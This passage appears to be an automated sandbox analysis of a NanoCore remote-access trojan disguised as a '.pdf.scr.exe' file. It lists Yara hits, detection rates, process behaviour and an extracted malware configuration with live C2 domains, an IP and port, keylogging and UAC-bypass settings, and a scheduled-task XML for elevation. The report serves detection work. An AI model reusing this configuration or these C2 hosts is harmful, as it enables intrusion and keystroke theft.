      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Multi AV Scanner detection for submitted file
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeReversingLabs: Detection: 26%
      Source: 22.2.RegSvcs.exe.720000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 10.2.RegSvcs.exe.6210000.7.unpackAvira: Label: TR/NanoCore.fadte
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 004349256789197.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003DA69B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003EC220
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FB348 FindFirstFileExA,0_2_003FB348
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C0E387
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C0D836
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C1A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00C1A488
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,6_2_00C165F1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDC642 FindFirstFileExW,6_2_00BDC642
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00C172E9
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C17248 FindFirstFileW,FindClose,6_2_00C17248

      Networking

      barindex
      Uses dynamic DNS services
      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00C0A54A
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR

      Operating System Destruction

      barindex
      Protects its processes via BreakOnTermination flag
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
